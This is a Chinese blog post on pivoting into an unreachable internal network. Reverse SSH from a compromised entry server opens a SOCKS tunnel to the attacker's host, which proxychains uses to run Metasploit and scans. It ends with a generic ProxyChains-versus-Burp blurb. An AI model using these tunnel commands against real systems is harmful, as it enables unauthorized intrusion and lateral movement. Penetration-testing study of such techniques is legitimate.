proxychains

上一篇是要借助外部的工具来实现内网代理,并且有很大的局限性,如果远程主机没开ssh或者做了防火墙规则给过滤掉一般的IP,就不能再用了
这里我们讲一下通过反向代理和本地proxychains来实现内网代理功能,对目标内网进行入侵渗透。不说废话,看图文……
蛋疼了,不发图了,直接写文字,
大的环境作一下介绍,目标主机是内网不可上网的NN台服务器,各种环境,各种操作系统都有,入口鸡是可以上网的服务器,但是不能终端,不能反弹马出来,于是考虑用反向SSH结合本地proxychains来作soks代理,对内网机器进行渗透

本地操作系统为*nix,有外网IP或者映射,开放SSH

于是我们之需要在本地修改一个地方:

编辑 /etc/proxychains.conf

nano /etc/proxychains.conf
要选 dynamic_chain而不是random_chain和strict_chain,即注释掉strict_chain和random_chain那两行。
然后在最后的[ProxyList]下面添加:
socks5 127.0.0.1 7070这样我们在本地的代理端口就是7070,
在远程入口机器上我们执行
ssh -fND 7070 root@youip
然后我们可以在本地使用我们的proxychain启动某些程序对内网的机器进行蛋疼的一些动作了,比如扫描什么的

root@metasploit:/home/exploit# proxychains /pentest/exploits/framework3/msfconsole
ProxyChains-3.1 (http://proxychains.sf.net)
剩下的事情你懂得,我就不多说了,抛了个转头,高手一笑而过就可以了,别吐口水,有玉的就砸过来吧,现金先用卡也可以,可兑换支票和债券也可以的……

http://pauldotcom.com/2010/03/nessus-scanning-through-a-meta.html

http://www.digininja.org/blog/nessus_over_sock4a_over_msf.php

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ProxyChains是一个可以将应用程序的网络流量通过多个代理服务器进行转发的工具。它可以用于增加网络匿名性和绕过网络限制。而Burp Suite是一个用于攻击web应用程序的集成平台,包含了多个工具,用于加快攻击应用程序的过程。两者之间没有直接的关联。 ProxyChains可以配置多个代理服务器,使网络请求经过一系列代理进行转发,从而增加网络匿名性。而Burp Suite则是一个集成了多个工具的平台,可以用于发现和利用web应用程序的漏洞。它提供了代理、日志、警报等功能,以帮助安全测试人员进行应用程序的渗透测试。 在使用Burp Suite时,可以配置代理服务器让浏览器或其他应用程序的流量经过Burp Suite进行拦截和分析。但与ProxyChains不同,Burp Suite并不是一个代理工具,它更多地用于安全测试和渗透测试。 所以,ProxyChains和Burp Suite是两个不同的工具,用途和功能也不相同。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [Burpsuite 简单使用教程-kali系统](https://blog.csdn.net/qq_32610227/article/details/130731939)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值